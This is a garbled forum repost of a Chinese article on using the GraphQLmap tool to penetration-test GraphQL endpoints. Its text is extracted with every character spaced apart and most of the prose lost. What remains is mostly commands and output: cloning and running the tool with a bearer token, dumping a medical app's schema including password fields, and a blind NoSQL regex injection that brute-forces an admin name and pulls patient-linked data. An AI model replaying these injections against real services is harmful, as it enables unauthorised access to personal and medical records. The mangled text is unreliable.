[16926] 2021-06-19_如何使用GraphQLmap对GraphQL节点进行渗透测试

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2021-06-19_如何使用GraphQLmap对GraphQL节点进行渗透测试 使 G r a p h Q L m a p G r a p h Q L A l p h a _ h 4 c k   F r e e B u f   2 0 2 1 - 0 6 - 1 9 G r a p h Q L m a p G r a p h Q L m a p G r a p h Q L 广 使 G r a p h Q L m a p G r a p h Q L 使 使 G r a p h Q L G r a p h Q L 使 d u m p _ n e w G r a p h Q L 使 a u t o c o m p l e t e $   g i t   c l o n e   h t t p s : / / g i t h u b . c o m / s w i s s k y r e p o / G r a p h Q L m a p $   p y t h o n   g r a p h q l m a p . p y                                                                                                                                   _ _ _ _ _                                   _             _ _ _ _     _                                                             /   _ _ _ _ |                               |   |         /   _ _   |   |                                                         |   |     _ _   _   _ _   _ _   _   _   _ _   |   | _ _   |   |     |   |   |           _   _ _   _ _ _       _ _   _   _   _ _       |   |   | _   |   ' _ _ /   _ `   |   ' _   |   ' _   |   |     |   |   |         |   ' _   `   _     /   _ `   |   ' _     |   | _ _ |   |   |   |   ( _ |   |   | _ )   |   |   |   |   | _ _ |   |   | _ _ _ _ |   |   |   |   |   |   ( _ |   |   | _ )   |     _ _ _ _ _ | _ |     _ _ , _ |   . _ _ / | _ |   | _ | _ _ _ _ _ _ _ _ _ _ | _ |   | _ |   | _ | _ _ , _ |   . _ _ /                                     |   |                                                                               |   |                                             | _ |                                                                               | _ |                                                                                           A u t h o r : S w i s s k y   V e r s i o n : 1 . 0 u s a g e :   g r a p h q l m a p . p y   [ - h ]   [ - u   U R L ]   [ - v   [ V E R B O S I T Y ] ]   [ - - m e t h o d   [ M E T H O D ] ]   [ - - h e a d e r s   [ H E A D E R S ] ] o p t i o n a l   a r g u m e n t s :     - h ,   - - h e l p                     s h o w   t h i s   h e l p   m e s s a g e   a n d   e x i t     - u   U R L                             U R L   t o   q u e r y   :   e x a m p l e . c o m / g r a p h q l ? q u e r y = { }     - v   [ V E R B O S I T Y ]             E n a b l e   v e r b o s i t y     - - m e t h o d   [ M E T H O D ]       H T T P   M e t h o d   t o   u s e   i n t e r a c t   w i t h   / g r a p h q l   e n d p o i n t     - - h e a d e r s   [ H E A D E R S ]   H T T P   H e a d e r s   s e n t   t o   / g r a p h q l   e n d p o i n t     - - j s o n                             S e n d   r e q u e s t s   u s i n g   P O S T   a n d   J S O N p y t h o n 3   g r a p h q l m a p . p y   - u   h t t p s : / / y o u r h o s t n a m e . c o m / g r a p h q l   - v   - - m e t h o d   P O S T   - - h e a d e r s   ' { " A u t h o r i z a t i o n "   :   " B e a r e r   e y J h b G c i O i J I U z I 1 N i I s I n R 5 c C I 6 I k p X V C J 9 . e y J 0 Z X h 0 I j o i b m 8 g c 2 V j c m V 0 c y B o Z X J l I D 1 Q I n 0 . J q q d O e s C - R 4 L t O S 9 H 0 y 7 b I q - M 8 A G Y j K 9 2 x 4 K 3 h c B A 6 o " } ' G r a p h Q L m a p   >   d u m p _ n e w                                           = = = = = = = = = = = = =   [ S C H E M A ]   = = = = = = = = = = = = = = = e . g :   n a m e [ T y p e ] :   a r g   ( T y p e ! )                                      
G r a p h Q L G r a p h Q L G r a p h Q L 使 G R A P H Q L _ I N C R E M E N T G R A P H Q L _ C H A R S E T Q u e r y                                                                                                     d o c t o r [ ] :   e m a i l   ( S t r i n g ! ) ,                                                                                                                                           d o c t o r s [ D o c t o r ] :                                                                                                                                                               p a t i e n t s [ P a t i e n t ] :                                                                                                                                                           p a t i e n t [ ] :   i d   ( I D ! ) ,                                                       a l l r e n d e z v o u s [ R e n d e z v o u s ] :                                                                                                                                           r e n d e z v o u s [ ] :   i d   ( I D ! ) ,                                                                                                                                 D o c t o r                                                                                                   i d [ I D ] :                                                                                                                                                                                 f i r s t N a m e [ S t r i n g ] :                                                           l a s t N a m e [ S t r i n g ] :                                                                                                                                                             s p e c i a l t y [ S t r i n g ] :                                                           p a t i e n t s [ N o n e ] :                 r e n d e z v o u s [ N o n e ] :                 e m a i l [ S t r i n g ] :                 p a s s w o r d [ S t r i n g ] : [ . . . ] G r a p h Q L m a p   >   { d o c t o r s ( o p t i o n s :   1 ,   s e a r c h :   " {   " l a s t N a m e " :   {   " $ r e g e x " :   " A d m i n " }   } " ) { f i r s t N a m e   l a s t N a m e   i d } } {         " d a t a " :   {                 " d o c t o r s " :   [                         {                                 " f i r s t N a m e " :   " A d m i n " ,                                 " i d " :   " 5 d 0 8 9 c 5 1 d c a b 2 d 0 0 3 2 f d d 0 8 d " ,                                 " l a s t N a m e " :   " A d m i n "                         }                 ]         } } G r a p h Q L m a p   >   { d o c t o r s ( o p t i o n s :   1 ,   s e a r c h :   " {   " l a s t N a m e " :   {   " $ r e g e x " :   " A d m i G R A P H Q L _ C H A R S E T " }   } " ) { f i r s t N a m e   l a s t N a m e   i d } }       [ + ]   Q u e r y :   ( 4 5 )   { d o c t o r s ( o p t i o n s :   1 ,   s e a r c h :   " {   " l a s t N a m e " :   {   " $ r e g e x " :   " A d m i ! " }   } " ) { f i r s t N a m e   l a s t N a m e   i d } }       [ + ]   Q u e r y :   ( 4 5 )   { d o c t o r s ( o p t i o n s :   1 ,   s e a r c h :   " {   " l a s t N a m e " :   {   " $ r e g e x " :   " A d m i $ " }   } " ) { f i r s t N a m e   l a s t N a m e   i d } }       [ + ]   Q u e r y :   ( 4 5 )   { d o c t o r s ( o p t i o n s :   1 ,   s e a r c h :   " {   " l a s t N a m e " :   {   " $ r e g e x " :   " A d m i % " }   } " ) { f i r s t N a m e   l a s t N a m e   i d } }       [ + ]   Q u e r y :   ( 4 5 )   { d o c t o r s ( o p t i o n s :   1 ,   s e a r c h :   " {   " l a s t N a m e " :   {   " $ r e g e x " :   " A d m i ( " }   } " ) { f i r s t N a m e   l a s t N a m e   i d } }       [ + ]   Q u e r y :   ( 4 5 )   { d o c t o r s ( o p t i o n s :   1 ,   s e a r c h :   " {   " l a s t N a m e " :   {   " $ r e g e x " :   " A d m i ) " }   } " ) { f i r s t N a m e   l a s t N a m e   i d } }       [ + ]   Q u e r y :   ( 2 0 6 )   { d o c t o r s ( o p t i o n s :   1 ,   s e a r c h :   " {   " l a s t N a m e " :   {   " $ r e g e x " :   " A d m i * " }   } " ) { f i r s t N a m e   l a s t N a m e   i d } }      
N o S Q L i 使 B L I N D _ P L A C E H O L D E R   N o S Q L i S Q L [ + ]   Q u e r y :   ( 4 5 )   { d o c t o r s ( o p t i o n s :   1 ,   s e a r c h :   " {   " l a s t N a m e " :   {   " $ r e g e x " :   " A d m i + " }   } " ) { f i r s t N a m e   l a s t N a m e   i d } }       [ + ]   Q u e r y :   ( 4 5 )   { d o c t o r s ( o p t i o n s :   1 ,   s e a r c h :   " {   " l a s t N a m e " :   {   " $ r e g e x " :   " A d m i , " }   } " ) { f i r s t N a m e   l a s t N a m e   i d } }       [ + ]   Q u e r y :   ( 4 5 )   { d o c t o r s ( o p t i o n s :   1 ,   s e a r c h :   " {   " l a s t N a m e " :   {   " $ r e g e x " :   " A d m i - " }   } " ) { f i r s t N a m e   l a s t N a m e   i d } }       [ + ]   Q u e r y :   ( 2 0 6 )   { d o c t o r s ( o p t i o n s :   1 ,   s e a r c h :   " {   " l a s t N a m e " :   {   " $ r e g e x " :   " A d m i . " }   } " ) { f i r s t N a m e   l a s t N a m e   i d } }       [ + ]   Q u e r y :   ( 4 5 )   { d o c t o r s ( o p t i o n s :   1 ,   s e a r c h :   " {   " l a s t N a m e " :   {   " $ r e g e x " :   " A d m i / " }   } " ) { f i r s t N a m e   l a s t N a m e   i d } }       [ + ]   Q u e r y :   ( 4 5 )   { d o c t o r s ( o p t i o n s :   1 ,   s e a r c h :   " {   " l a s t N a m e " :   {   " $ r e g e x " :   " A d m i 0 " }   } " ) { f i r s t N a m e   l a s t N a m e   i d } }       [ + ]   Q u e r y :   ( 4 5 )   { d o c t o r s ( o p t i o n s :   1 ,   s e a r c h :   " {   " l a s t N a m e " :   {   " $ r e g e x " :   " A d m i 1 " }   } " ) { f i r s t N a m e   l a s t N a m e   i d } }           [ + ]   Q u e r y :   ( 2 0 6 )   { d o c t o r s ( o p t i o n s :   1 ,   s e a r c h :   " {   " l a s t N a m e " :   {   " $ r e g e x " :   " A d m i ? " }   } " ) { f i r s t N a m e   l a s t N a m e   i d } } [ + ]   Q u e r y :   ( 2 0 6 )   { d o c t o r s ( o p t i o n s :   1 ,   s e a r c h :   " {   " l a s t N a m e " :   {   " $ r e g e x " :   " A d m i n " }   } " ) { f i r s t N a m e   l a s t N a m e   i d } } G r a p h Q L m a p   >   n o s q l i Q u e r y   >   { d o c t o r s ( o p t i o n s :   " { " " p a t i e n t s . s s n " : 1 } " ,   s e a r c h :   " {   " p a t i e n t s . s s n " :   {   " $ r e g e x " :   " ^ B L I N D _ P L A C E H O L D E R " } ,   " l a s t N a m e " : " A d m i n "   ,   " f i r s t N a m e " : " A d m i n "   } " ) { i d ,   f i r s t N a m e } } C h e c k   >   5 d 0 8 9 c 5 1 d c a b 2 d 0 0 3 2 f d d 0 8 d C h a r s e t   >   0 1 2 3 4 5 6 7 8 9 a b c d e f - [ + ]   D a t a   f o u n d :   4 f 5 3 7 c 0 a - 7 d a 6 - 4 a c c - 8 1 e 1 - 8 c 3 3 c 0 2 e f 3 b G r a p h Q L m a p   > G r a p h Q L m a p   >   p o s t g r e s q l i G r a p h Q L m a p   >   m y s q l i G r a p h Q L m a p   >   m s s q l i

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则